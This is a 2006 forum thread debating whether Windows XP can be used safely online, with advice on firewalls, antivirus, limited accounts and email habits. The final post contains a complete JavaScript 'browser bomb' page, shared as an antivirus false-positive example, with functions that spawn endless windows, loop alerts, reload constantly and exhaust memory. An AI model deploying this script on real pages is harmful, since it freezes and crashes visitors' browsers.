Is windows xp secure enough?

Discussion in 'Windows Operating Systems' started by -=N0N@ME420=-, May 24, 2006.

?

Do you fear that you'll be hacked if you use xp and connect to the net

  1. Yes

    89 vote(s)
    31.6%
  2. No

    161 vote(s)
    57.1%
  3. I use another O/S

    32 vote(s)
    11.3%
  1. -=N0N@ME420=-

    -=N0N@ME420=- Member

    Joined:
    May 9, 2004
    Messages:
    7,562
    Do you feel safe enough to use the internet on a pc with Windows XP without being worried that you'll be hacked?
     
  2. Deckham

    Deckham Member

    Joined:
    Jan 16, 2005
    Messages:
    6,964
    Location:
    Essendon, Melbourne
    Yes, with reasonable software precautions.
     
  3. Rational

    Rational Member

    Joined:
    Apr 17, 2005
    Messages:
    4,494
    yeah, i feel completely safe. Even safer when running in a non admin account.

    And anyways, who would want to hack me? All I got is Warez and Music :lol:
     
  4. FumblesMcStupid

    FumblesMcStupid (Banned or Deleted)

    Joined:
    Sep 17, 2005
    Messages:
    1,057
    Location:
    3142
    With any OS the biggest security threat is the user. Good internet practises is the best guard from anything.
     
  5. El.Sean

    El.Sean Member

    Joined:
    Mar 4, 2006
    Messages:
    483
    Location:
    Bayswater, Vic.
    No, I fear I'll get viruses if I use a clean install of XP and go to a lan without relevant protection. ;)

    That is all.
     
  6. OP
    OP
    -=N0N@ME420=-

    -=N0N@ME420=- Member

    Joined:
    May 9, 2004
    Messages:
    7,562
    7/19 fear they'll be hacked using xp. Anyone got any reasons?
     
  7. cvidler

    cvidler Member

    Joined:
    Jun 29, 2001
    Messages:
    11,660
    Location:
    Canberra
    Quoted for Truth.

    I run XP and IE (under an admin account too). How many spyware/virus have I gotten in the last 4 years - ZERO. It's all about the setup and practices. All web browsing is done under the Restricted zone by default, only sites I choose make it into the trusted zone. No spyware/virus.

    Hardware firewall protects incoming port based attacks else. I'd probaly still be happy enough with XP's built in firewall if I needed to.
     
  8. Whisper

    Whisper Member

    Joined:
    Jun 27, 2001
    Messages:
    8,297
    Location:
    Sydney
    I would be happy with the security of Windows XP AFTER somebody like you spent the several hours it takes to make it bullet proof.

    This unfortunately excludes 90% of the people in these forums and 99.9% of the computer using population.

    So the questions are:

    Is Windows XP Secure by default. Short answer is NO

    Can Windows XP be made secure. Short answer is YES
     
  9. Maelstrom

    Maelstrom Member

    Joined:
    Jul 10, 2001
    Messages:
    1,604
    Location:
    Canberra
    WinXP + a good virus scanner (NOD32, or AVG if you want free) + (MS Defender or SpybotS&D+Spywareblaster) + (Firefox/Opera optionally) + a DSL modem with NAT and no ports forwarded and you should be perfectly fine unless you do something really silly like download 0-day warez from Kazaa and don't keep your system updated.

    Takes about 10 minutes to do and you're set.

    A default unpatched XP install behind a USB modem is ofcourse vulnerable as hell but things are fine if you have a basic idea of what you're doing. Vista will make it much, much easier for even the lowest common denominator too.

    Win98/ME on the other hand can be secured but they're more vulnerable and aren't worth the time anyway.
     
  10. MR CHILLED

    MR CHILLED D'oh!

    Joined:
    Jan 2, 2002
    Messages:
    136,354
    Location:
    Omicron Persei 8
    I feel confident enough in my own skills, and not necessarily the OS, to keep intruders out. And in terms of files, everything is backed up accordingly anyways.
     
  11. Jed D`Lagged

    Jed D`Lagged Member

    Joined:
    Feb 23, 2004
    Messages:
    425
    Location:
    http://jed.delagged.net
    I havn't used a firewall or virus protection in years. I run Spybot and Trend online virus scan every six months. Never had an intruder, never had a virus, Spybot just finds cookies.

    If you're the kind of person that needs active protection, you need to rethink your computer using habits.

    Personally, I find this a better method of knowing what's going on with your computer: Use Task Manager. ctrl + shift + esc. Learn to sort by CPU and username. Know what every executable under your username is. Learn some of the system processes too. If you don't know what something is, google it. Sometimes it's a good idea to google it anyway even if you think you know. Yes, you can get rootkits that hide themselves, but avoiding this comes down to "Know what executables you're executing". If you're downloading every free screensaver under the sun, downloading and running game cracks wrapped in executables, then you deserve what you get.
     
  12. crix75

    crix75 Member

    Joined:
    Jan 16, 2003
    Messages:
    887
    Location:
    Adelaide, SA
    With appropriate precautions, XP is fairly secure, being behind a real, properly configured firewall. It's people such as Jed who don't appear to have proper protection that cause others to have to "secure" their systems..


    Hmm, don't really agree with this.. I don't have any real need for active protection, but as an admin-type person, I don't feel running a system without protection to be particularly wise... Has no-one ever sent you a trojan/virus via email without knowing it? I wouldn't trust an online virus scan, they cannot gain full access to your file system...

    This is fine, except for those rootkits/trojans/other exe's that are able to hide themselves from TaskMan, nor will it help if the "app" is started by another user whilst you are using a limited user account. (This can be done, MS even have internally available documentation on how to do it..)

    EDIT:
    I have a file on my system that contains some examples of how not to create buttons for forms etc in HTML. This file gets a false positive from Norton, NOD, AVG and others. The online scans from both Symantec and Trend fail to recognise this file...
     
    Last edited: May 26, 2006
  13. MR CHILLED

    MR CHILLED D'oh!

    Joined:
    Jan 2, 2002
    Messages:
    136,354
    Location:
    Omicron Persei 8
    Yep, I don't agree with it either. There's plenty of things that can happen to users who don't necessarily visit pron or warez sites.
     
  14. OP
    OP
    -=N0N@ME420=-

    -=N0N@ME420=- Member

    Joined:
    May 9, 2004
    Messages:
    7,562
    I have a similar situation but I sit on both sides of the fence as always, at home I have no av, and no as(anti-spyware), my system is fine, at work I have av and as and both continually pop up with 0 results found, and I'm fine on both ends, but exploit wise, both appear to be insecure. :/
     
  15. Jed D`Lagged

    Jed D`Lagged Member

    Joined:
    Feb 23, 2004
    Messages:
    425
    Location:
    http://jed.delagged.net
    rofl, l2admin
    If you know anything about viruses these days, they're nothing like what they were. They're shitty script kiddy worm viruses that propogate via stupidity. None of this boot sector infection vector anymore. With that being said, I'm pretty sure Online Virus Scanners can get everywhere in the filesystem. And even if you're talking about said boot sector or other such places, and even if they can't get there, it doesn't matter, because nothing infects there anymore.

    Has anyone sent me a virus? Most definitly. Also, I use Outlook! Oh noes! But if I'm getting an email from Valerie Bigtits with the subject of HEY SEXY MY BOYFRIEND IS AWAY LETS PLAY, I'll be double clicking that bitch and opening that attachment in a second. Oh wait, no I won't, because I'm not a moron. If I don't recognise the person, and the subject is sus, it's either spam or a virus. This is common sense. Common sense that the average user does not have, which is why they need this protection. If I ever need to open a questionable email, I do it over webmail. Problem solved without bogging down my system with useless services. Welcome to standard computer use.
    Did you only read half my post? Rootkits are easily avoided as long as you know what you're executing. And even if something is sus, just run rootkit revealer from sysinternals, and remove the files in question via recovery console. Problem solved. And if you're going to try and get tricky, if a user is a limited user, then firstly they don't have the rights to install spyware or rootkits. That's the whole point of a limited user account. And if they're a limited user, then it's up to the System Administrator to maintain the integrity of the system. Oh wait, they ran something that exploited a vulnerability and installed itself! Then that's the fault of the admin not keeping the system patched. Welcome to standard computer use.
     
  16. crix75

    crix75 Member

    Joined:
    Jan 16, 2003
    Messages:
    887
    Location:
    Adelaide, SA
    Hmm, see the edit to my previous post... and the file in question is stored in the "Program Files" tree..

    So, you've never gotten a real, non-spam email from a friend or colleague that had a virus/trojan attached?

    Of course! The answer is to be so paranoid that I may as well not actually use my PC. Did you actually read my post? MS have an internal KB article that explains how to install a service whilst the user is logged in with a limited user account.. No exploits involved, just a little temporary registry mod..
     
  17. zzzzz

    zzzzz Member

    Joined:
    Dec 25, 2001
    Messages:
    1,820
    Location:
    Sydney, Australia.
    This article or section is missing references or citation of sources.
    You can help zzzzz by introducing appropriate citations.​
    I'm interested in exactly where your italics 'temporary' registry mod is put in the registry.
     
  18. Jed D`Lagged

    Jed D`Lagged Member

    Joined:
    Feb 23, 2004
    Messages:
    425
    Location:
    http://jed.delagged.net
    Firstly, you said not being able to access some parts of the file system. Then you back it up with a false positive? Two totally different things.
    Yes, definitely. But anyone who uses Outlook with the Preview Pane on deserve what they get. There's also a "View in plain text" function. There are plenty of ways to use your system safely without needing to resort to third party apps.
    Congratulations on your hyperbole, but at least you got my point.
    I love how you left this deliciously ambiguous. Until you actually post me an article, I can only make assumptions on what you've said.

    Did you mean that the user themselves can install a service onto the machine? That's the System Admins fault for poor registry permission administration.

    Or did you mean someone can install a service with administrative privileges? That's the System Admins fault for letting the admin account get compromised.

    As I said, I can't accurately comment until you show me exactly what you're talking about. And besides, if we're talking about Users, that's a completely different story from home machines that you and I use.
     
  19. gords

    gords Oh deer!

    Joined:
    Aug 3, 2001
    Messages:
    6,623
    Location:
    Sydney, Australia
    You don't have to be a genius to:
    a) Use user accounts,
    b) Install an AV program,
    c) Install an anti-malware program,
    d) Turn on automatic updates, and
    e) If desired, install an alternative browser.

    That will make a Windows XP machine fairly secure (but this obviously depends on common sense things like choosing good passwords, not leaving the machine logged in all the time if other people are around, etc). That's without going into the local security policy and tightening things up there.
     
  20. crix75

    crix75 Member

    Joined:
    Jan 16, 2003
    Messages:
    887
    Location:
    Adelaide, SA
    This has been left ambiguous for a reason. I'm not supposed to have access to MS's internal KB articles, and to reveal such info may also reveal where my access comes from.. I'm not about to risk someone else's job just to satisfy your curiosity.. Unless you have a spare ~$100K to compensate the person in question. Sorry, zzzzz, this goes for you as well..

    In regards to the false positive, my point was that AV actually installed on my machine finds it, neither of the online scanners even touched it.. And yes, it is a basic no-frills script kiddy kind of thing..

    Here's a copy for your browsing pleasure:
    Code:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    
    <html>
    <head>
    	<title>Untitled</title>
    </head>
    
    <body>
    
    
    <!-- START OF SCRIPT -->
    <!-- For more scripts visit http://www.netpedia.com -->
    <SCRIPT LANGUAGE="JavaScript">
    
    <!-- Begin
    function AnnoyingButton()
    {
       while (true)
           window.alert("HAHAHA...you can't do anything anymore in Netscape without exiting and restarting....HAHAHA so gimme da UT now...or else!") }
    // Keep opening windows over and over again
    function WindowBomb()
    {
        var iCounter = 0    // dummy counter
        while (true)
          {
            window.open("http://www.NETural.com/~ccamel","CRASHING" + iCounter,"width=1,height=1,resizable=no")
            iCounter++
          }
    }
    // Not as interesting as the other bombs, but this one forces the user to
    // stay at the current page.  User cannot switch to another page, or click
    // stop to stop the reloading.
    function ReloadBomb()
    {
       history.go(0)                         // reload this page
       window.setTimeout('ReloadBomb()',1)   // tell netscape to hit this function
                                             // every milisecond =)
    }
    // Not a very interesting bomb, it does nothing really :>
    function WhileLoopLock()
    {
       while (true){}
    }
    var szEatMemory = "GOBBLEGOBBLE"  // our string to consume our memory
    // Now this function EatMemoryInTime is a interesting one that could be
    // placed on a timer for maximum nastiness :>  I have been able to get
    // up to 4Megs consumed by Netscape forcing my machine to crawl =)
    // AND it's time driven!  No while loops here!
    function EatMemoryInTime()
    {
        szEatMemory = szEatMemory + szEatMemory                    // keep appending
        window.status = "String Length is: " + szEatMemory.length  // report size
        window.setTimeout('EatMemoryInTime()',1);                  // tell netscape to hit this function
    }
    // End -->
    
    </SCRIPT>
    <font size=2>
    [Everything in here will <Font Color="#FF0000"><B>KILL</B></Font> your browser]<br>
    </center>
    <FORM method=post name="FormAction" action="mailto:"+"ccamel@netural.com">
    <li>Window Spawner -  opens windows, over and over and over
    again. Sucking up memory resources, until Netscape uses all of it's
    assigned memory and crashes<P>
    <INPUT TYPE="button" value="Exploding Windows"
    Name="btnExplodeWindows" onClick="WindowBomb()"><P><br>
    <li>Continous Prompts - Don't you love being stuck in a
    infinite loops of Javascript Prompts?<P>
    <INPUT TYPE="button" value="Annoying Button" Name="btnAnnoy"
    onClick="AnnoyingButton()"><P><br>
    <li>Continous Reloads - Reload the page every milli-second<P>
    <INPUT TYPE="button" value="Reload Bomb" Name="btnReload"
    onClick="ReloadBomb()"><P><br>
    <li>Empty While Loop - Just sits forever in the while loop<P>
    <INPUT TYPE="button" value="While Loop Lock" Name="btnWhile"
    onClick="WhileLoopLock()"><p><br>
    <li>Memory-Monster - infinite calcultations can take up a
    lot of memory ;P<P>
     <INPUT TYPE="button" value="Eat Memory In Time" Name="btnEatTime"
    onClick="EatMemoryInTime()"><p><br>
    <li>mailto submit bug - putting a '+' in front of the email
    address in front of mailto in the action of a form is BAD!<P>
    <INPUT TYPE="button" value="Action!" onClick="document.FormAction.submit()"><br>
    </font>
    <!-- END OF SCRIPT -->
    
    
    </body>
    </html>
    
     

Share This Page